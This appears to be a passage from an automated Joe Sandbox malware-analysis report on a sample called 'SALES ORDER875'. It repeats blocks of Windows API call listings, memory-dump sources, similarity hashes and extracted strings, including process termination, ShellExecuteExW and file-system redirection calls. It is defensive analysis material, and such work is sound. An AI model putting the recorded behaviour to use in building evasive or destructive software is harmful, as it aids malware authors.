                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                    • Opcode ID: b57319f601279b2245a9003c567cd7290983e85ca6ffd039e2f774bbd624191e
                                                                                                                                                                                    • Instruction ID: fada385de55f47273d0748cf9b38f0e6046776cd99d3eddec38900cb7e6f0440
                                                                                                                                                                                    • Opcode Fuzzy Hash: b57319f601279b2245a9003c567cd7290983e85ca6ffd039e2f774bbd624191e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0018475A41718BBEB105BA69C89A9EBF78EB48351F048065FA04A7280D6709800CFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00381BF4
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00381BFC
                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00381C07
                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00381C12
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00381C1A
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00381C22
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                    • Opcode ID: a428e82d3561a462ccac1a675f3f9661d58435f106ddddb9aea86767e0065cb0
                                                                                                                                                                                    • Instruction ID: 773b48fd4cfd248a8a0b955137f87f25266ab8bb238f7c5216529e47069501b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: a428e82d3561a462ccac1a675f3f9661d58435f106ddddb9aea86767e0065cb0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C40167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003EEB30
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003EEB46
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 003EEB55
                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EEB64
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EEB6E
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EEB75
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                    • Opcode ID: e7afe55936a21d8f8f2d3ea75a6cef6e0ee02389b87246dd05bb9e900d1c7601
                                                                                                                                                                                    • Instruction ID: 6dcdd654254c694bc3c1f9ec0b0f9b102357091c228762ed7adaaecf2d9f48f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7afe55936a21d8f8f2d3ea75a6cef6e0ee02389b87246dd05bb9e900d1c7601
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81F03072680168BBE72157529C4DEEF3A7CEFCAB11F008168F611D1191D7A05A01CAB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?), ref: 003D7452
                                                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 003D7469
                                                                                                                                                                                    • GetWindowDC.USER32(?), ref: 003D7475
                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 003D7484
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 003D7496
                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 003D74B0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                                                    • Opcode ID: d505913f326c93aa895912de27e317443ac06ec6edaf5248bd9a22fcd15273c9
                                                                                                                                                                                    • Instruction ID: 65519ca42fabd5f519b4156ab4ba623e918e6cc2797c5a454636a18d7ae0fdd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d505913f326c93aa895912de27e317443ac06ec6edaf5248bd9a22fcd15273c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95018632440225FFEB525FA4EC48BEA7BB6FB04321F618075F926A21A1CB311E41EB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E187F
                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 003E188B
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003E1894
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003E189C
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003E18A5
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E18AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                    • Opcode ID: ddd6cde9d32d59973d584a16ef5fe58e1a3506779f0c2b77e3c865e81455d031
                                                                                                                                                                                    • Instruction ID: eca340b45515a7b55f7fc2dab50c1650a5dcaf3a69c6f7b3b4dfff49d96e71ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: ddd6cde9d32d59973d584a16ef5fe58e1a3506779f0c2b77e3c865e81455d031
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEE0E5364C4215BBDB016FA1ED4C98ABF3AFF49B22B10C230F625810B0CB729420DF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0038BEB3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                    • String ID: D%E$D%E$D%E$D%ED%E
                                                                                                                                                                                    • API String ID: 1385522511-2669726496
                                                                                                                                                                                    • Opcode ID: aa88869d98e3a913e883a5b1bde5d02c8fee794de7ef430c4fc769f940412c39
                                                                                                                                                                                    • Instruction ID: cbd110479f1d2596fbe6b66e385bb7d5356621c899fea2b6f4c1ddd7999c8a07
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa88869d98e3a913e883a5b1bde5d02c8fee794de7ef430c4fc769f940412c39
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97915675A0030ADFCB19DF58C0906AAFBF5FF59310B2581AAD941AB351E771EA81CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003A0242: EnterCriticalSection.KERNEL32(0045070C,00451884,?,?,0039198B,00452518,?,?,?,003812F9,00000000), ref: 003A024D
                                                                                                                                                                                      • Part of subcall function 003A0242: LeaveCriticalSection.KERNEL32(0045070C,?,0039198B,00452518,?,?,?,003812F9,00000000), ref: 003A028A
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 003A00A3: __onexit.LIBCMT ref: 003A00A9
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00407BFB
                                                                                                                                                                                      • Part of subcall function 003A01F8: EnterCriticalSection.KERNEL32(0045070C,?,?,00398747,00452514), ref: 003A0202
                                                                                                                                                                                      • Part of subcall function 003A01F8: LeaveCriticalSection.KERNEL32(0045070C,?,00398747,00452514), ref: 003A0235
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                    • String ID: +T=$5$G$Variable must be of type 'Object'.
                                                                                                                                                                                    • API String ID: 535116098-217563773
                                                                                                                                                                                    • Opcode ID: 26f0aba13f07fefa97f5801f4bf50b58719e4b59260f2bd0837c68ba4e8e44f1
                                                                                                                                                                                    • Instruction ID: 6f678b5262914ea629b962d0b99b23b74f7d78becd062789fb4c6ef19cdd169b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f0aba13f07fefa97f5801f4bf50b58719e4b59260f2bd0837c68ba4e8e44f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0191AE70A04209AFCB05EF54D891DBEB7B1FF45304F10806AF806AB392DB75AE41CB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00387620: _wcslen.LIBCMT ref: 00387625
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003EC6EE
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003EC735
                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003EC79C
                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003EC7CA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                                                    • Opcode ID: e56cf0b89b7794f5101f27688788d59c00f0392210ebdeddf1950197a5dadb26
                                                                                                                                                                                    • Instruction ID: 8f61a81cd71b60527c03671b36c6187bed54e91246d3997fc43aa84b540bacec
                                                                                                                                                                                    • Opcode Fuzzy Hash: e56cf0b89b7794f5101f27688788d59c00f0392210ebdeddf1950197a5dadb26
                                                                                                                                                                                    • Instruction Fuzzy Hash: EC51E1716243A09FD7129F2AC885BAFB7E8AF45310F042B29F991D61E1DB60DC06CB56
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0040AEA3
                                                                                                                                                                                      • Part of subcall function 00387620: _wcslen.LIBCMT ref: 00387625
                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0040AF38
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040AF67
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                    • Opcode ID: 6d9e3d9facc657b2c5587b4136740b3c8bf3ab7ef6ba797e8eed3617e346791e
                                                                                                                                                                                    • Instruction ID: 08ef19135692c2867faaa27178a34261476821c4eb52d4ad59a55accdd440c1f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d9e3d9facc657b2c5587b4136740b3c8bf3ab7ef6ba797e8eed3617e346791e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B715871A00719DFCB15EF64C484A9EBBF1BF09314F1484AAE816AB392C774ED41CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003E7206
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003E723C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003E724D
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E72CF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                                                    • Opcode ID: f79760ac1398484b24b45b773670d3db89a1983456300cad1675e617a89efd32
                                                                                                                                                                                    • Instruction ID: 9d12651dd6f5eebaad74e7ee4b4fbc4704d8493a521522f649848c9608881907
                                                                                                                                                                                    • Opcode Fuzzy Hash: f79760ac1398484b24b45b773670d3db89a1983456300cad1675e617a89efd32
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5441E371604214EFDB16CF55C884B9A7BB9EF44300F1186ADBE099F28AD7B1DD40CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                                                                                    • API String ID: 176396367-4004644295
                                                                                                                                                                                    • Opcode ID: e497032a5e41c1d82121f96ec9d6e60d057c7280725a81fe140e9bc3409b0663
                                                                                                                                                                                    • Instruction ID: eb290423c516dbab01bc63d518ddbf6420eb5b632d21c030c6c9a25f9073a098
                                                                                                                                                                                    • Opcode Fuzzy Hash: e497032a5e41c1d82121f96ec9d6e60d057c7280725a81fe140e9bc3409b0663
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE31C432B00169CADB21EF6C98D027B33919BA1750B15423BE845BB3C5E779CD459BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00412F8D
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00412F94
                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00412FA9
                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00412FB1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                                                                    • Opcode ID: d536590497584b3854d13ba6b5b562843907ae9fa55759c33bed7833c9e154a0
                                                                                                                                                                                    • Instruction ID: 547a580702ff3b2dee2bf53559344433f08ba755a5b9dddbd3f01022d7093f8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d536590497584b3854d13ba6b5b562843907ae9fa55759c33bed7833c9e154a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F21C071204205AFEB104F64DD84FFB37BDEB59364F10422AF950D6290D7B5DCA2A768
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003A4D1E,003B28E9,?,003A4CBE,003B28E9,004488B8,0000000C,003A4E15,003B28E9,00000002), ref: 003A4D8D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003A4DA0
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,003A4D1E,003B28E9,?,003A4CBE,003B28E9,004488B8,0000000C,003A4E15,003B28E9,00000002,00000000), ref: 003A4DC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 1e0ff2bef0fc525dd657df14b04bb4bc6d8961270fd07bcc4dc642aad50e4532
                                                                                                                                                                                    • Instruction ID: 6d33fe4453bddc0223423fdfe1d0bd78a72cf8d7447fbabc3ea3b151b6cca6a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e0ff2bef0fc525dd657df14b04bb4bc6d8961270fd07bcc4dc642aad50e4532
                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F0AF34A80218BBDB119F90DC89BEDBBF4EF84712F0040A5F809A2261CB709940CA98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00384EDD,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E9C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00384EAE
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00384EDD,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384EC0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                                                    • Opcode ID: 64bb2b178e14026ab144c55d04e138a396849992b63a306c402e7edee129bdba
